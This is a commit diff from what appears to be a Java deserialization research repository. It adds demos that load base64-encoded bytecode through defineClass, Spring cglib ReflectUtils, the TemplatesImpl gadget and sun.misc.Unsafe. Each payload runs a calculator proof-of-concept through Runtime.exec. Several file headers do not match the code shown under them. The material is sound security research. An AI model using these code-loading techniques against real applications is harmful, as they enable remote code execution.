add Class load :)

Author: Whoopsunix

README.md

@@ -41,11 +41,11 @@ By. Whoopsunix
   - [Apache Derby](#apache-derby)
   - [Sqlite](#sqlite)
 - [0x06 Serialization](#0x06-serialization)
-  - [BCEL](#bcel)
-  - [远程类加载](#remotejar)
+  - [类加载](#class-load)
   - [XMLSerialization](#xmlserialization)
     - [JavaBean](#jarbean)
     - [XStream](#xstream)
+  - [构造方法利用](#constructorexp)
 - [0x07 文件读写 Demo](#0x07-文件读写-demo)
 - [鸣谢](#Thanks)
 
@@ -210,19 +210,14 @@ Version Test
 
 # 0x06 [Serialization](Serialization)
 
-## [BCEL](Serialization/BCELAttack)
+## [Class load](Serialization/ClassLoad)
 
-- [x] static 触发
-- [x] 构造方法触发
-- [x] 方法触发
-
-## [RemoteJar](Serialization/ClassLoad)
-
-- [x] URLClassLoader
-  - [x] static 触发
-  - [x] 构造方法触发
-  - [x] 方法触发
-- [x] AppClassLoader
++ AppClassLoader
++ URLCLassLoader
++ BCEL
++ TransletClassLoaderDemo
++ Unsafe
++ ReflectUtils
 
 ## [XMLSerialization](Serialization/XMLSerialization)
 
@@ -236,6 +231,10 @@ Version Test
 - [x] BCEL
 - [x] RemoteJar
 
+## [ConstructorEXP](Serialization/ConstructorEXP)
+
+Class.forName 场景通过构造方法RCE
+
 ### XStream
 
 主要为 CVE 不具体展开，<= 1.4.17 的生成集成在 yso 项目中

Serialization/BCELAttack/src/main/java/org/example/Exec.java

@@ -19,6 +19,11 @@
             <artifactId>Utils</artifactId>
             <version>1.0-SNAPSHOT</version>
         </dependency>
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-core</artifactId>
+            <version>5.3.18</version>
+        </dependency>
     </dependencies>
 
     <build>

Serialization/BCELAttack/src/main/java/org/example/ExecArg.java

@@ -9,20 +9,38 @@
 public class AppClassLoaderDemo {
     public static void main(String[] args) throws Exception{
         /**
-         * Base64解密后加载
+         * defineClass
+         *  Base64解密后加载
          */
-        // generate
-//        String b64Str = new B64().encodeJavaClass(Exec.class);
+//        // generate
+////        String b64Str = new B64().encodeJavaClass(Exec.class);
+//        // open -a Calculator.app
+//        String b64Str = "yv66vgAAADQAIgoABwAVCgAWABcIABgKABYAGQcAGgcAGwcAHAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQASTG9yZy9leGFtcGxlL0V4ZWM7AQANU3RhY2tNYXBUYWJsZQcAGwcAGgEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEACUV4ZWMuamF2YQwACAAJBwAdDAAeAB8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAgACEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQb3JnL2V4YW1wbGUvRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAGoAAgACAAAAEiq3AAG4AAISA7YABFenAARMsQABAAQADQAQAAUAAwALAAAAFgAFAAAABwAEAAkADQALABAACgARAAwADAAAAAwAAQAAABIADQAOAAAADwAAABAAAv8AEAABBwAQAAEHABEAAAgAEgAJAAEACgAAAE8AAgABAAAADrgAAhIDtgAEV6cABEuxAAEAAAAJAAwABQADAAsAAAASAAQAAAAQAAkAEgAMABEADQATAAwAAAACAAAADwAAAAcAAkwHABEAAAEAEwAAAAIAFA==";
+//
+//        byte[] bytes = Base64.getDecoder().decode(b64Str);
+////        ClassLoader classLoader = this.getClass().getClassLoader();
+////        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+//        ClassLoader classLoader = ClassLoader.getSystemClassLoader();
+//
+//        Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
+//        defineClassMethod.setAccessible(true);
+//        Class<?> loadedClass = (Class<?>) defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
+//        loadedClass.newInstance();
 
-        String b64Str = "yv66vgAAADQAIgoABwAVCgAWABcIABgKABYAGQcAGgcAGwcAHAEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQASTG9yZy9leGFtcGxlL0V4ZWM7AQANU3RhY2tNYXBUYWJsZQcAGwcAGgEACDxjbGluaXQ+AQAKU291cmNlRmlsZQEACUV4ZWMuamF2YQwACAAJBwAdDAAeAB8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAgACEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAQb3JnL2V4YW1wbGUvRXhlYwEAEGphdmEvbGFuZy9PYmplY3QBABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABgAHAAAAAAACAAEACAAJAAEACgAAAGoAAgACAAAAEiq3AAG4AAISA7YABFenAARMsQABAAQADQAQAAUAAwALAAAAFgAFAAAABwAEAAkADQALABAACgARAAwADAAAAAwAAQAAABIADQAOAAAADwAAABAAAv8AEAABBwAQAAEHABEAAAgAEgAJAAEACgAAAE8AAgABAAAADrgAAhIDtgAEV6cABEuxAAEAAAAJAAwABQADAAsAAAASAAQAAAAQAAkAEgAMABEADQATAAwAAAACAAAADwAAAAcAAkwHABEAAAEAEwAAAAIAFA==";
+        /**
+         * Class.forName
+         */
+//        // static
+        Class cls = Class.forName("org.example.Exec");
+//        // 构造方法
+//        cls.newInstance();
 
-        byte[] bytes = Base64.getDecoder().decode(b64Str);
-//        ClassLoader classLoader = this.getClass().getClassLoader();
-        ClassLoader classLoader = Thread.currentThread().getContextClassLoader();
+        /**
+         * ClassLoader
+         */
+        // static 和 构造方法都不会触发
+        Class cls1 = ClassLoader.getSystemClassLoader().loadClass("org.example.Exec");
+//        cls1.newInstance();
 
-        Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
-        defineClassMethod.setAccessible(true);
-        Class<?> loadedClass = (Class<?>) defineClassMethod.invoke(classLoader, bytes, 0, bytes.length);
-        loadedClass.newInstance();
     }
 }

Serialization/ClassLoad/pom.xml

@@ -6,13 +6,15 @@
 public class Exec {
     public Exec() {
         try {
+            System.out.println("Exec");
             Runtime.getRuntime().exec("open -a Calculator.app");
         } catch (Exception e) {
         }
     }
 
     static {
         try {
+            System.out.println("static Exec");
             Runtime.getRuntime().exec("open -a Calculator.app");
         } catch (Exception e) {
         }

Serialization/ClassLoad/src/main/java/org/example/AppClassLoaderDemo.java

@@ -0,0 +1,20 @@
+package org.example;
+
+import org.tools.encryption.B64;
+
+/**
+ * @author Whoopsunix
+ */
+public class ReflectUtilsDemo {
+    public static void main(String[] args) throws Exception{
+//        String b64Str = new B64().encodeJavaClass(Exec.class);
+        String b64Str = "yv66vgAAADQAMgoACwAZCQAaABsIABwKAB0AHgoAHwAgCAAhCgAfACIHACMIACQHACUHACYBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAEkxvcmcvZXhhbXBsZS9FeGVjOwEADVN0YWNrTWFwVGFibGUHACUHACMBAAg8Y2xpbml0PgEAClNvdXJjZUZpbGUBAAlFeGVjLmphdmEMAAwADQcAJwwAKAApAQAERXhlYwcAKgwAKwAsBwAtDAAuAC8BABZvcGVuIC1hIENhbGN1bGF0b3IuYXBwDAAwADEBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQALc3RhdGljIEV4ZWMBABBvcmcvZXhhbXBsZS9FeGVjAQAQamF2YS9sYW5nL09iamVjdAEAEGphdmEvbGFuZy9TeXN0ZW0BAANvdXQBABVMamF2YS9pby9QcmludFN0cmVhbTsBABNqYXZhL2lvL1ByaW50U3RyZWFtAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAEWphdmEvbGFuZy9SdW50aW1lAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsAIQAKAAsAAAAAAAIAAQAMAA0AAQAOAAAAdgACAAIAAAAaKrcAAbIAAhIDtgAEuAAFEga2AAdXpwAETLEAAQAEABUAGAAIAAMADwAAABoABgAAAAcABAAJAAwACgAVAAwAGAALABkADQAQAAAADAABAAAAGgARABIAAAATAAAAEAAC/wAYAAEHABQAAQcAFQAACAAWAA0AAQAOAAAAWwACAAEAAAAWsgACEgm2AAS4AAUSBrYAB1enAARLsQABAAAAEQAUAAgAAwAPAAAAFgAFAAAAEQAIABIAEQAUABQAEwAVABUAEAAAAAIAAAATAAAABwACVAcAFQAAAQAXAAAAAgAY";
+        defineClass_cglib(b64Str, "org.example.Exec");
+    }
+
+    public static void defineClass_cglib(String calcBase64, String className) throws Exception {
+        org.springframework.cglib.core.ReflectUtils.defineClass(className,
+                java.util.Base64.getDecoder().decode(calcBase64)
+                , ClassLoader.getSystemClassLoader());
+    }
+}

Serialization/BCELAttack/src/main/java/org/example/BCEL.java renamed to Serialization/ClassLoad/src/main/java/org/example/BCEL.java

@@ -0,0 +1,47 @@
+package org.example;
+
+import org.tools.ClassFiles;
+import org.tools.encryption.B64;
+
+import java.io.Serializable;
+import java.lang.reflect.Method;
+
+/**
+ * @author Whoopsunix
+ */
+public class TransletClassLoaderDemo {
+    public static void main(String[] args) throws Exception {
+        String b64Str = new B64().encodeJavaClass(Exec.class);
+        defineClass_TemplatesImpl(b64Str);
+    }
+
+    public static class PPP implements Serializable {
+
+        private static final long serialVersionUID = 8207363842866235160L;
+    }
+
+    // com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
+    public static void defineClass_TemplatesImpl(String calcBase64) throws Exception {
+        byte[] bytes = java.util.Base64.getDecoder().decode(calcBase64);
+        com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl templates = new com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl();
+        java.lang.reflect.Field field = templates.getClass().getDeclaredField("_bytecodes");
+        field.setAccessible(true);
+        field.set(templates, new byte[][]{bytes, ClassFiles.classAsBytes(PPP.class)});
+        field = templates.getClass().getDeclaredField("_name");
+        field.setAccessible(true);
+        field.set(templates, "anystr");
+        field = templates.getClass().getDeclaredField("_transletIndex");
+        field.setAccessible(true);
+        field.set(templates, 0);
+        field = templates.getClass().getDeclaredField("_tfactory");
+        field.setAccessible(true);
+        field.set(templates, new com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl());
+
+        Method method = templates.getClass().getDeclaredMethod("getOutputProperties");
+//        Method method = templates.getClass().getDeclaredMethod("getTransletInstance");
+        method.setAccessible(true);
+        method.invoke(templates, null);
+
+//        templates.newTransformer();
+    }
+}

Serialization/ClassLoad/src/main/java/org/example/Exec.java

@@ -0,0 +1,29 @@
+package org.example;
+
+import org.tools.encryption.B64;
+
+import java.lang.reflect.Constructor;
+
+/**
+ * @author Whoopsunix
+ */
+public class UnsafeDemo {
+    public static void main(String[] args) throws Exception {
+        String b64Str = new B64().encodeJavaClass(Exec.class);
+        defineClass_unsafe(b64Str, "org.example.Exec");
+    }
+
+    // sun.misc.Unsafe
+    public static void defineClass_unsafe(String calcBase64, String className) throws Exception {
+//        sun.misc.Unsafe unsafe = sun.misc.Unsafe.getUnsafe();
+        Class cls = Class.forName("sun.misc.Unsafe");
+        Constructor constructor = cls.getDeclaredConstructor();
+        constructor.setAccessible(true);
+        sun.misc.Unsafe unsafe = (sun.misc.Unsafe) constructor.newInstance();
+
+        byte[] bytes = java.util.Base64.getDecoder().decode(calcBase64);
+        System.out.println(bytes.length);
+        Class cls1 = unsafe.defineClass(className, bytes, 0, bytes.length, null, null);
+        cls1.newInstance();
+    }
+}

Serialization/ClassLoad/src/main/java/org/example/ReflectUtilsDemo.java

@@ -3,23 +3,16 @@
   <modelVersion>4.0.0</modelVersion>
 
   <groupId>org.example</groupId>
-  <artifactId>BCELAttack</artifactId>
+  <artifactId>ConstructorEXP</artifactId>
   <version>1.0-SNAPSHOT</version>
   <packaging>jar</packaging>
 
-  <name>BCELAttack</name>
-  <url>http://maven.apache.org</url>
+  <name>ConstructorEXP</name>
 
   <properties>
     <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
   </properties>
 
   <dependencies>
-    <dependency>
-      <groupId>junit</groupId>
-      <artifactId>junit</artifactId>
-      <version>3.8.1</version>
-      <scope>test</scope>
-    </dependency>
   </dependencies>
 </project>

Serialization/ClassLoad/src/main/java/org/example/TransletClassLoaderDemo.java

@@ -11,8 +11,8 @@
 
     <modules>
         <module>ClassLoad</module>
-        <module>BCELAttack</module>
         <module>XMLSerialization</module>
+        <module>ConstructorEXP</module>
     </modules>
 
     <properties>